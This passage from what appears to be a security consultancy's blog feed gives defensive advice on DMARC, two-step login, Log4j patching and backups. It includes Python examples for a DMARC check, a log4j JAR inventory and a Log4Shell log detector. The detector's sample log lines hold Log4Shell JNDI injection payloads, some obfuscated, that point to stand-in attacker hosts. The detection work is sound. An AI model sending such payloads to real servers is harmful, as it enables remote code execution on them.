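    # Legitimate mail from a subdomain: SPF passes and relaxed alignment accepts it.
    print(dmarc_disposition(RECORD, "example.com", "pass", "mail.example.com", "fail", ""))
    # Spoofed mail: the attacker's own SPF and DKIM pass, but for attacker.example,
    # which is not aligned with example.com, so the policy applies.
    print(dmarc_disposition(RECORD, "example.com", "pass", "attacker.example", "pass", "attacker.example"))
    print(weak_policy_findings("v=DMARC1; p=none"))
```

<p>The second call is the whole point of DMARC: an attacker can set up perfectly valid SPF and DKIM for a domain they own, and only the alignment check against the From: domain the reader sees stops the message. Feed weak_policy_findings your own record (mxtoolbox or dig will show it) to see whether you are still at p=none.</p>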



<p>The post <a href="https://fosterinstitute.com/block-inbound-and-outbound-fraudulent-email-messages/">Block Inbound and Outbound Fraudulent Email Messages</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>How Attackers Bypass Your Password Protection Even if You Use Two-Step Login</title>
		<link>https://fosterinstitute.com/how-attackers-bypass-your-password-protection-even-if-you-use-two-step-login/</link>
		
		<dc:creator><![CDATA[Mike Foster]]></dc:creator>
		<pubDate>Thu, 27 Jan 2022 23:51:54 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Cybersecurity Audits]]></category>
		<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">https://fosterinstitute.com/?p=5109</guid>

					<description><![CDATA[<p>Before you let passwords and two-step login be the security controls you rely on the most, remember bad actors can altogether bypass the login if they take control of users&#8217; computers. Think of buildings that have locked doors. If an employee lets a stranger tailgate and walks through the door behind your employee, the stranger [&#8230;]</p>
<p>The post <a href="https://fosterinstitute.com/how-attackers-bypass-your-password-protection-even-if-you-use-two-step-login/">How Attackers Bypass Your Password Protection Even if You Use Two-Step Login</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Before you let passwords and two-step login be the security controls you rely on the most, remember bad actors can altogether bypass the login if they take control of users&#8217; computers.</p>



<p>Think of buildings that have locked doors. If an employee lets a stranger tailgate and walks through the door behind your employee, the stranger doesn&#8217;t need a key or a badge.</p>



<p>It is the same with passwords. If an attacker is already dwelling in a computer, the attacker simply waits for the user to log in and then rides that authenticated session: the malware runs as the user, sees what the user sees, and acts through the user&#8217;s session without ever being prompted for the password, a token, a text message, or anything else. The login control was not broken; it was satisfied by the legitimate user and then abused.</p>



<p>So don&#8217;t believe that having great authentication is the primary protection for your organization. Protect the computers from being compromised by managing security updates, restricting local user privileges, having IT security audits, and the other recommendations in the blog on our website, including this one <a href="https://fosterinstitute.com/executives-five-key-cybersecurity-steps-to-protect-your-organization-and-the-vital-timing/" target="_blank" rel="noreferrer noopener">fosterinstitute.com/executives-five-key-cybersecurity-steps-to-protect-your-organization-and-the-vital-timing/</a></p>



<p>Please forward this to your associates so that they know passwords and two-step login are essential to have, and they are not enough.</p>
<p>The post <a href="https://fosterinstitute.com/how-attackers-bypass-your-password-protection-even-if-you-use-two-step-login/">How Attackers Bypass Your Password Protection Even if You Use Two-Step Login</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Executives: Five Key Cybersecurity Steps to Protect Your Organization, and the Vital Timing</title>
		<link>https://fosterinstitute.com/executives-five-key-cybersecurity-steps-to-protect-your-organization-and-the-vital-timing/</link>
		
		<dc:creator><![CDATA[Mike Foster]]></dc:creator>
		<pubDate>Fri, 07 Jan 2022 19:22:46 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Cybersecurity Audits]]></category>
		<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">https://fosterinstitute.com/?p=5088</guid>

					<description><![CDATA[<p>As an executive that leads, and depends on, your IT Professionals or outsourced IT provider, be sure to know these five essential steps that have a massive impact on your cybersecurity protection and how frequently your team must address them: Apply Critical Security Updates &#8211; This is an essential yet never-ending task. Executives decide how [&#8230;]</p>
<p>The post <a href="https://fosterinstitute.com/executives-five-key-cybersecurity-steps-to-protect-your-organization-and-the-vital-timing/">Executives: Five Key Cybersecurity Steps to Protect Your Organization, and the Vital Timing</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>As an executive that leads, and depends on, your IT Professionals or outsourced IT provider, be sure to know these five essential steps that have a massive impact on your cybersecurity protection and how frequently your team must address them:</p>



<ol class="wp-block-list"><li>Apply Critical Security Updates &#8211; This is an essential yet never-ending task. Executives decide how soon they want the updates installed after release. It is common to apply workstation updates immediately. Update servers as quickly as your IT team can support, preferably within a week, leaving time to test, rehearse the rollback, and deploy updates in stages. Remember to update non-Microsoft products, and patch your infrastructure devices, including firewalls and routers.</li><li>Change User Accounts so they are not Local Administrators &#8211; If a user is a local administrator and an attacker takes over that user&#8217;s computer, the attacker&#8217;s code runs with full administrative rights on it. Your IT team must make each user a standard local user every time they set up a new computer.</li><li>Ensure IT Pros Manage Computers &#8211; Provide your IT team time to configure remote management for every new device a worker will use. They need to control your anti-malware solution, manage patches, and perform other tasks on each computer via a management console.</li><li>Implement two-step login &#8211; Protection for your network, VPN, and online programs. If you choose, Microsoft lets you go passwordless with the Microsoft Authenticator app, Windows Hello, or a FIDO2 security key; text-message codes work too, but they are the weakest option because they can be phished or intercepted. One-tap login is convenient, but turn on number matching so a user cannot approve a prompt they did not start. Your IT team needs to set up the authentication on your services and enroll each new worker you add to your team.</li><li>Have an Independent Cybersecurity Advisor who Performs Yearly Comprehensive Testing &#8211; They will guide and answer your questions and perform comprehensive testing at least once a year.</li></ol>



<p>If your team has not had time to implement the other items in this list yet, the process might take a year, depending on their workload and expertise.</p>



<p>Additionally, Practice Restoring Your Data &#8211; It is not a trivial process to practice a full restore, but you must practice to ensure the process works and restores quickly enough. Practice yearly.</p>



<p>Please forward this message to your executive friends so they can visit about these essential steps with the IT Professionals who support their organizations.</p>



<p>The post <a href="https://fosterinstitute.com/executives-five-key-cybersecurity-steps-to-protect-your-organization-and-the-vital-timing/">Executives: Five Key Cybersecurity Steps to Protect Your Organization, and the Vital Timing</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Give Your IT Teams Guidance and Time to Address Log4j Cybersecurity Issues Immediately</title>
		<link>https://fosterinstitute.com/give-your-it-teams-guidance-and-time-to-address-log4j-cybersecurity-issues-immediately/</link>
		
		<dc:creator><![CDATA[Mike Foster]]></dc:creator>
		<pubDate>Wed, 15 Dec 2021 20:47:20 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Cybersecurity Audits]]></category>
		<category><![CDATA[Family Security]]></category>
		<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">https://fosterinstitute.com/?p=5066</guid>

					<description><![CDATA[<p>Some of our customers take the Log4j situation seriously, and some ignore it. You or your organization might use products and services from Amazon, Apple, Cisco, Google, LinkedIn, VMware, and other affected organizations. Do not ignore the danger. Attackers are abandoning some of their old attack methods to exploit Log4j vulnerabilities because the attack is [&#8230;]</p>
<p>The post <a href="https://fosterinstitute.com/give-your-it-teams-guidance-and-time-to-address-log4j-cybersecurity-issues-immediately/">Give Your IT Teams Guidance and Time to Address Log4j Cybersecurity Issues Immediately</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Some of our customers take the Log4j situation seriously, and some ignore it. You or your organization might use products and services from Amazon, Apple, Cisco, Google, LinkedIn, VMware, and other affected organizations. Do not ignore the danger. Attackers are abandoning some of their old attack methods to exploit Log4j vulnerabilities because the attack is so easy, and the benefits are enormous.</p>



<p>Organizational leaders, please support your IT teams by providing them with time to address this risky situation. They’re addressing many end-of-the-year tasks, and dealing with this potential crisis might delay their progress.</p>



<p>The Microsoft Threat Intelligence Center (MSTIC) reports that foreign governments are actively exploiting the situation now. Nation-states can attack the government, military, businesses, and individual users throughout the country.</p>



<p>One of a bad actor’s top priorities is establishing remote access into networks, computers, and electronic devices. Once they gain access, attackers can dwell quietly in networks to evade detection.</p>



<p>The US Cybersecurity and Infrastructure Security Agency (CISA) ordered all federal agencies to patch Log4j by Christmas Eve. That could be too late: exploitation attempts were observed before the vulnerability was even publicly disclosed on December 9, and mass scanning began within hours of the disclosure.</p>



<p>And, of course, ransomware attacks exploiting Log4j will be more successful than ever.</p>



<p>Steps your IT Professionals and software developers can consider taking:</p>



<p>See guidance from the USA Cybersecurity Infrastructure Security Agency (CISA) <a href="https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance" target="_blank" rel="noreferrer noopener">https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance</a>.</p>



<p>The Agency created and is updating an exhaustive list of affected software and tools at <a href="https://github.com/cisagov/log4j-affected-db" target="_blank" rel="noreferrer noopener">https://github.com/cisagov/log4j-affected-db</a>. Review <a href="https://github.com/YfryTchsGD/Log4jAttackSurface" target="_blank" rel="noreferrer noopener">https://github.com/YfryTchsGD/Log4jAttackSurface</a> too. That page lists well-known organizations including Amazon, Apple, Google, LinkedIn, and VMware. The great news is that highly qualified developers at those organizations started working on a fix immediately. The bad news is that attackers started developing exploits immediately too.</p>



<p>If your organization uses VMware, review their website to find guidance. An example page is <a href="https://blogs.vmware.com/cloud/2021/12/11/vmsa-2021-0028-log4j-what-you-need-to-know/" target="_blank" rel="noreferrer noopener">https://blogs.vmware.com/cloud/2021/12/11/vmsa-2021-0028-log4j-what-you-need-to-know/</a>.</p>



<p>Go to the Mitre.org page about CVE-2021-44228 <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228" target="_blank" rel="noreferrer noopener">https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228</a> and look through the references to identify links to guidance from your firewall manufacturer or VPN provider, including Cisco and SonicWALL.</p>



<p>Search the web using the keywords Log4j or CVE-2021-44228 with the names of products and applications you use.</p>



<p>Know that your organization is NOT safe just because you don&#8217;t intentionally use open-source tools. Log4j is a Java library that many commercial products, appliances, and services bundle silently, and the client programs that talk to those services may bundle it too, so it can be running on your servers and workstations without anyone having chosen it.</p>



<p>Block LDAP access if possible. Last week, we discovered LDAP open on the public side of a network, available to all the world, at one of the organizations we&#8217;re auditing right now. We notified their highly qualified and experienced IT team leader, and they closed the port immediately. They explained, &#8220;We had used that some time ago for connecting LDAP to service now before using (an updated) service. I never went back to clean it up until (now).&#8221; Had we not discovered the problem, the port would still be open today. There is no shame to the IT Pro. Most executives have no idea of the deluge of information that falls on IT departments daily, and the team&#8217;s goal is to focus on fixing broken problems first. That exposure can exist at any organization.</p>



<p>Move vulnerable servers into filtered subnets or VLANs to help wall them off from the rest of your network. Filter all traffic to allow only essential ports, protocols, sources, and destinations. Pay particular attention to outbound traffic: the exploit works by making the vulnerable server reach out to an attacker-controlled host over LDAP (389/636), RMI (1099), or DNS, so a server that is denied unexpected egress to the Internet is much harder to exploit even before it is patched. Egress filtering does not remove the vulnerable code, so it complements patching rather than replacing it.</p>



<p>If you must expose LDAP, limit LDAP traffic to trusted endpoints only to help mitigate the risks.</p>



<p>If you have internally developed software or a website with active code, ask your developers to upgrade the log4j library to the newest 2.x release ASAP. Apache&#8217;s first fix, log4j 2.15.0, shipped in December 2021 and was quickly followed by further releases that closed related gaps (2.16.0 removes message lookups and disables JNDI by default), so take the current version listed on Apache&#8217;s security page rather than pinning to 2.15.0. Look for log4j-core inside the applications and appliances you buy as well, not only the code you write; the library is frequently bundled inside other products.</p>
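<p>As an added example, not code from the original post or from Apache, here is a small Python script that inventories log4j-core JARs so developers and IT staff can see which copies still need the upgrade above. It reads the version that Maven records inside each JAR and checks whether the JNDI lookup class is present. The JAR it builds is a constructed fixture, and the fixed-version thresholds are the ones Apache lists on its security page (2.17.1, with 2.12.4 and 2.3.2 for the Java 7 and Java 6 branches).</p>

```python
# Added example (not code from the original post or from Apache): inventory
# log4j-core JARs and decide whether each still needs the upgrade the post
# asks for. It reads the version Maven records inside the JAR and checks
# whether the JNDI lookup class (the code behind CVE-2021-44228) is present.
# Assumptions: the JAR below is constructed in memory for illustration; the
# "fixed" versions are those on Apache's security page (2.17.1 for Java 8+,
# with the 2.12.4 and 2.3.2 backports for Java 7 and Java 6).
import io
import re
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(version: str) -> tuple:
    """"2.14.1" -> (2, 14, 1); "2.0-beta9" -> (2, 0, 0)."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not match:
        raise ValueError("unrecognised version: " + version)
    return tuple(int(part or 0) for part in match.groups())


def needs_upgrade(version: str) -> bool:
    """True for any log4j-core 2.x release below the fixed release of its branch."""
    major, minor, patch = parse_version(version)
    if major != 2:
        # log4j 1.x is not affected by CVE-2021-44228; it is end-of-life, a separate problem.
        return False
    if minor == 12:
        fixed = (2, 12, 4)   # Java 7 branch
    elif minor == 3:
        fixed = (2, 3, 2)    # Java 6 branch
    else:
        fixed = (2, 17, 1)
    return (major, minor, patch) < fixed


def inspect_jar(jar_bytes: bytes) -> dict:
    """Read the log4j-core version and JNDI lookup presence from JAR bytes."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = None
        if POM_PROPS in names:
            for line in jar.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    return {
        "version": version,
        "has_jndi_lookup": JNDI_CLASS in names,
        # No version metadata (shaded or repackaged JAR): suspect if the lookup class is there.
        "needs_upgrade": needs_upgrade(version) if version else JNDI_CLASS in names,
    }


def scan_tree(root: str) -> list:
    """Walk a directory for *.jar files and report those carrying log4j-core
    metadata or the JNDI lookup class. Nested JARs inside WAR/EAR files are
    not unpacked here; extend this if your applications ship that way."""
    results = []
    for path in Path(root).rglob("*.jar"):
        try:
            info = inspect_jar(path.read_bytes())
        except zipfile.BadZipFile:
            continue
        if info["version"] or info["has_jndi_lookup"]:
            results.append((str(path), info))
    return results


def build_sample_jar(version: str, include_jndi_class: bool) -> bytes:
    """Constructed test fixture: a minimal JAR with log4j-core's pom.properties."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as jar:
        jar.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=%s\n" % version)
        if include_jndi_class:
            jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not real bytecode
    return buffer.getvalue()


if __name__ == "__main__":
    for ver, jndi in (("2.14.1", True), ("2.16.0", False), ("2.17.1", False), ("2.12.4", False)):
        print(ver, inspect_jar(build_sample_jar(ver, jndi)))
```

<p>Point scan_tree at an application directory; anything reported with needs_upgrade set should be patched, and a JAR that contains the JNDI lookup class but no version metadata is a repackaged copy that deserves a manual look.</p>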



<p>Apache provides technical details to help protect against the log4j exploits at <a href="https://logging.apache.org/log4j/2.x/security.html" target="_blank" rel="noreferrer noopener">https://logging.apache.org/log4j/2.x/security.html</a></p>



<p>Search your providers&#8217; sites for any references to Log4j or CVE-2021-44228. Many providers are still in the process of evaluating their products. Examples include:</p>

<ul class="wp-block-list"><li>Amazon: in the process of updating products</li><li>Cisco products: search the web for the keywords: Vulnerability in Apache Log4j Library Affecting Cisco Products</li><li>FortiGuard: search the web for the keywords: FortiGuard Apache log4j2 log messages substitution</li><li>Juniper Networks: search the web for the keywords: Juniper 2021-12 Out of Cycle Security Advisory</li><li>McAfee: search the web for the keywords: McAfee Enterprise coverage for Apache Log4j CVE-2021-44228 Remote Code Execution</li><li>Okta: search the web for the keywords: Okta&#8217;s response to CVE-2021-44228 Log4Shell</li><li>Oracle: search the web for the keywords: Oracle Security Alert CVE-2021-44228</li><li>SolarWinds: search the web for the keywords: SolarWinds Apache Log4j Critical Vulnerability (CVE-2021-44228)</li><li>SonicWall: Email Security is affected, and perhaps other products. Search the web for the keywords: SonicWall Apache Log4j Remote Code Execution Vulnerability Log4Shell CVE-2021-44228</li><li>Symantec: including Endpoint Protection Manager</li><li>VMware: heavily impacted, see <a href="https://www.vmware.com/security/advisories/VMSA-2021-0028.html" target="_blank" rel="noreferrer noopener">https://www.vmware.com/security/advisories/VMSA-2021-0028.html</a></li><li>Ubiquiti: search the web for the keywords: Ubiquiti UniFi Network Application 6.5.54</li></ul>



<p>Kudos to these organizations and others addressing the issues related to Log4j.</p>



<p>Thank you for helping make the world a safer place to live and work!</p>



<p>More information for executives about Log4j:</p>



<p>Log4j could affect your firewalls, VPN, websites you access, your cloud providers, apps, and ultimately you. The safest stance is to assume attackers compromised your systems and behave accordingly. Don&#8217;t panic. There&#8217;s no way to predict how severe, or hopefully mild, the fallout will be at your organization.</p>



<p>Ask your IT team to watch for abnormal behavior on your websites, networks, and computers. IT Teams can scroll down to the bottom of this message for technical suggestions to protect your organization.</p>
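<p>Watching for abnormal behavior starts with the web and application logs. Here is an added example, not from the original post, in Python: a detector for Log4Shell exploitation attempts in access-log lines that also unwinds the obfuscated lookups attackers used to slip past a plain search for ${jndi:. The log lines and addresses in it are constructed for illustration, and the lookup rewriting covers the lower/upper and &#8220;:-&#8221; default-value tricks rather than reimplementing Log4j&#8217;s full substitution engine.</p>

```python
# Added example (not code from the original post): flag Log4Shell
# (CVE-2021-44228) exploitation attempts in web-server access logs, including
# the obfuscated forms attackers used to slip past a plain "${jndi:" match.
# Assumptions: the log lines below are constructed for illustration, with
# documentation IP addresses; the lookup rewriting covers the lower/upper and
# ":-" default-value tricks, which is enough for detection, not a full Log4j
# string-substitution engine.
import re
from urllib.parse import unquote

# A lookup with no further lookup nested inside it.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What the attacker needs after resolution: a JNDI lookup over a supported protocol.
_PAYLOAD = re.compile(r"jndi:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|https?):[^\s\"'}]*", re.I)

# Constructed sample log (Apache combined format). Lines 1 to 4 are attempts;
# line 5 contains a lookup-looking string that is not JNDI.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:14:02:19 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://198.51.100.9:1099/a} HTTP/1.1" 400 0 "-" "-"',
    '203.0.113.9 - - [10/Dec/2021:14:02:22 +0000] "GET /%24%7Bjndi%3Adns%3A%2F%2Fexfil.example%7D HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.10 - - [10/Dec/2021:14:02:30 +0000] "GET /?q=${j${::-n}di:${env:NOPE:-l}dap://198.51.100.9/x} HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.11 - - [10/Dec/2021:14:02:40 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 12 "-" "-"',
]


def _resolve(body: str) -> str:
    """Rewrite one innermost Log4j lookup the way Log4j itself would:
    ${lower:J} -> j, ${upper:j} -> J, ${env:NOPE:-j} and ${::-j} -> j
    (":-" introduces a default used when the variable is unset). A jndi:
    lookup is kept whole so it stays visible; other lookups become plain text."""
    if ":-" in body:
        name, default = body.split(":-", 1)
        if not name.lower().startswith("jndi:"):
            return default
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    return body


def normalize(text: str, max_rounds: int = 30) -> str:
    """Collapse nested lookups from the inside out until the text stops
    changing (bounded so hostile input cannot keep us looping)."""
    for _ in range(max_rounds):
        rewritten = _INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if rewritten == text:
            break
        text = rewritten
    return text


def resolved_payload(line: str):
    """Return the resolved JNDI payload if the line is an attempt, else None."""
    decoded = unquote(unquote(line))  # twice, to catch double-encoded payloads
    if "${" not in decoded:
        return None
    match = _PAYLOAD.search(normalize(decoded))
    return match.group(0) if match else None


def is_log4shell_attempt(line: str) -> bool:
    return resolved_payload(line) is not None


def find_attempts(lines) -> list:
    """Return (line_index, resolved_payload) for every flagged line."""
    hits = []
    for index, line in enumerate(lines):
        payload = resolved_payload(line)
        if payload is not None:
            hits.append((index, payload))
    return hits


if __name__ == "__main__":
    for index, payload in find_attempts(SAMPLE_LOG):
        print("line %d: %s" % (index, payload))
```

<p>Run it over reverse-proxy, WAF, and application logs from early December 2021 onward. A hit shows that someone tried, not that it worked, so follow up by checking whether the host made an outbound LDAP, RMI, or DNS connection to the address in the resolved payload.</p>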



<p>Over the next several days, software and hardware vendors will release patches and updates to block the attack. But some attacks will succeed.</p>



<p>The Log4j vulnerability is so easy to exploit that it will plague e-commerce sites, cloud services, SaaS offerings, apps, and devices that log with Apache&#8217;s Log4j for a long time, until every affected server, application, and piece of hardware is patched or replaced.</p>



<p>The potential impact grows because Log4j is also bundled inside client programs, not only servers: if a consumer or business user runs an application that talks to a cloud service, Log4j may be running on the customer&#8217;s computer, phone, or tablet as well. Until they installed the patched game client, Minecraft Java Edition players were vulnerable to attackers compromising the player&#8217;s computer through something as simple as a chat message in the game. The stakes get higher if a user&#8217;s or company&#8217;s banking software accesses a bank server running a vulnerable version of Log4j. The SolarWinds attack only affected companies that ran the SolarWinds software on their networks. In this case, any company that uses any software or service that logs with Apache Log4j is potentially susceptible to attackers running programs on its network.</p>



<p>Then there is the question of what attackers will do. Will they plant ransomware in businesses and governments worldwide and keep it dormant, dwelling inside networks, to launch future attacks? Will attackers take over computers and devices to create a botnet army, sometimes without the owner&#8217;s knowledge? Will attackers use their army of machines to launch Distributed Denial of Service attacks that flood other services with so much traffic the targets shut down? In August, attackers launched a DDOS attack against Microsoft&#8217;s Azure cloud blasting Azure with more than 2.4 Terabits per second of disruptive traffic intended to overload Microsoft&#8217;s cloud. Amazon&#8217;s AWS and Google experienced similar attacks.</p>



<p>Interestingly, a security company released a &#8220;vaccine&#8221; program for the Log4j vulnerability. The script uses the remote code execution attack to fix the problem. Some gray hat hackers launch unapproved &#8220;attacks&#8221; across the Internet designed to mitigate the security problem and block other attacks. The hackers provide a &#8220;public service&#8221; delivered by random individuals to unknowing organizations without permission. And there&#8217;s a valid concern that bad actors could modify the tool to launch malicious attacks.</p>



<p>Exploits against log4j are emerging events. Attacks against Minecraft game users are in the news, but this potential crisis affects more than video games. Hopefully, there is no significant fallout, but the potential is enormous.</p>



<p>Keep your network safe.</p>
<p>The post <a href="https://fosterinstitute.com/give-your-it-teams-guidance-and-time-to-address-log4j-cybersecurity-issues-immediately/">Give Your IT Teams Guidance and Time to Address Log4j Cybersecurity Issues Immediately</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Help Your Third-Party Providers Be More Secure Because Your Security is Only as Good as Their Security</title>
		<link>https://fosterinstitute.com/help-your-third-party-providers-be-more-secure-because-your-security-is-only-as-good-as-their-security/</link>
		
		<dc:creator><![CDATA[Mike Foster]]></dc:creator>
		<pubDate>Fri, 12 Nov 2021 18:16:11 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Cybersecurity Audits]]></category>
		<category><![CDATA[Supporting IT Professionals]]></category>
		<guid isPermaLink="false">https://fosterinstitute.com/?p=5017</guid>

					<description><![CDATA[<p>Below is a letter you can send your third-party service providers if you want to give them pointers on being more secure. We’ve done the work to make this quicker for you. None of these are unreasonable for you to request. You and your IT team can customize the letter to fit the relationship best. [&#8230;]</p>
<p>The post <a href="https://fosterinstitute.com/help-your-third-party-providers-be-more-secure-because-your-security-is-only-as-good-as-their-security/">Help Your Third-Party Providers Be More Secure Because Your Security is Only as Good as Their Security</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Below is a letter you can send your third-party service providers if you want to give them pointers on being more secure. We’ve done the work to make this quicker for you.</p>



<p>None of these are unreasonable for you to request. You and your IT team can customize the letter to fit the relationship. These recommendations apply even if a company doesn&#8217;t have servers and does all of its work in the cloud.</p>



<p>Dear – you fill in the blank,</p>



<p>We are checking in with all of our valued service providers, including you. If your organization suffers a significant security incident, you might not be able to provide the service we count on from you. A security breach at your organization could impact our business too. In the interest of helping you protect your organization, here are some guidelines:</p>



<p>You must have a robust disaster recovery plan. You must be able to recover quickly if you lose access to your information. Your IT team needs to practice restoring because experiencing ransomware is not the best time to practice restoring all of your data for the first time.</p>



<p>It is essential that your IT team, or IT company, manage the security of all of your computers, including the computers any work from home employees use. Your IT professionals need to monitor the security update status, manage anti-virus, and perform other administrative functions that help protect the computers that your workers use.</p>



<p>Please discuss with your IT team or IT company how quickly they deploy critical security updates to your computers. Security updates sometimes cause issues, so it is best to test updates, especially server updates if you have servers, before deploying them. Because the updates often prevent attacks, there is a level of urgency.</p>



<p>Remove programs you aren’t using. Attackers sometimes gain access to your systems through programs, and they cannot exploit a program that’s not installed. Flash is an example of a program installed on many computers, but it provides a security risk. Your IT team can give you the details and identify other programs they can remove from computers to increase security.</p>



<p>Ask your IT team to make sure your user accounts are a &#8220;standard local user&#8221; on your computers. This one step can increase your security immensely. By default, the first account set up on a computer is a local administrator, and on many machines that is the account the employee then uses every day. This applies to Mac and Windows computers. If an attacker breaks into the computer, they inherit whatever rights the logged-in user has, so a local administrator account hands them elevated abilities to conquer your security protections.</p>



<p>Enable two-step verification on all the websites that require a login. In its most basic form, once two-step login is enabled, a user who enters a username and password also receives a text message with a code to complete the login. An authenticator app or a hardware security key is stronger than text messages, because text-message codes can be phished or intercepted, but even text-message codes help tremendously if an attacker steals one of your website passwords. The setting is usually in the security settings of the website. Three places two-step login is essential:</p>



<p>-SaaS programs your users run in the cloud. Zoom, QuickBooks Online, an ERP, G Suite, Office 365, and SalesForce are SaaS offerings.<br>-VPN Connections<br>-Remote Desktop Connections</p>



<p>Realize that connecting from public networks, including coffee shops and hotels, is risky, even if the user uses a VPN. It is more secure to use a phone or personal hotspot to connect a computer to the Internet. The added phone charges may be lower than you expect, especially if you change to a plan with unlimited data.</p>



<p>Please forward this to your service providers; it can help prevent big heartaches and expenses for you and them.</p>
<p>The post <a href="https://fosterinstitute.com/help-your-third-party-providers-be-more-secure-because-your-security-is-only-as-good-as-their-security/">Help Your Third-Party Providers Be More Secure Because Your Security is Only as Good as Their Security</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Be Sure to Back Up Your Cloud Data</title>
		<link>https://fosterinstitute.com/be-sure-to-back-up-your-cloud-data/</link>
		
		<dc:creator><![CDATA[Mike Foster]]></dc:creator>
		<pubDate>Fri, 22 Oct 2021 18:26:16 +0000</pubDate>
				<category><![CDATA[Cloud Security]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Cybersecurity Audits]]></category>
		<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">https://fosterinstitute.com/?p=4974</guid>

					<description><![CDATA[<p>Some organizations move their data to the cloud and stop backing it up. Cloud services offer ways to restore the data. But what happens if an attacker deletes your files and deletes the backup at the cloud service too? Consider backing up your data at a different cloud service. It is less likely that an [&#8230;]</p>
<p>The post <a href="https://fosterinstitute.com/be-sure-to-back-up-your-cloud-data/">Be Sure to Back Up Your Cloud Data</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Some organizations move their data to the cloud and stop backing it up. Cloud services offer ways to restore the data. But what happens if an attacker deletes your files and deletes the backup at the cloud service too?</p>



<p>Consider backing up your data at a different cloud service. It is less likely that an attacker could compromise both systems if your users only have access to one.</p>



<p>There are many cloud backup solutions, and it is best to allow your IT team to use the one they prefer. The Foster Institute neither endorses nor receives any compensation for mentioning products and services. Two examples of services that work well for our customers include <a href="http://veeam.com">veeam.com</a> and <a href="http://afi.ai">afi.ai</a>.</p>



<p>One significant problem with cloud restores is that the restoration process can take a long time if you store large amounts of data. It is essential to practice the restore process to estimate how long a full restore would take.</p>



<p>Please forward this to your friends so that they know it is essential to back up cloud data too.</p>
<p>The post <a href="https://fosterinstitute.com/be-sure-to-back-up-your-cloud-data/">Be Sure to Back Up Your Cloud Data</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>If You Outsource Your IT, it is Their Job to Keep You Happy, Not the Other Way Around.</title>
		<link>https://fosterinstitute.com/if-you-outsource-your-it-it-is-their-job-to-keep-you-happy-not-the-other-way-around/</link>
		
		<dc:creator><![CDATA[Mike Foster]]></dc:creator>
		<pubDate>Fri, 01 Oct 2021 14:21:01 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Cybersecurity Audits]]></category>
		<category><![CDATA[Supporting IT Professionals]]></category>
		<guid isPermaLink="false">https://fosterinstitute.com/?p=4967</guid>

					<description><![CDATA[<p>After we performed a cybersecurity audit for a company many years ago, the President and CEO assigned the recommendations to their IT consulting firm. What is different about this lead executive is that he gently applies firm pressure on their IT consultants to complete the recommended improvements. He&#8217;s kind and respectful to his consulting company, [&#8230;]</p>
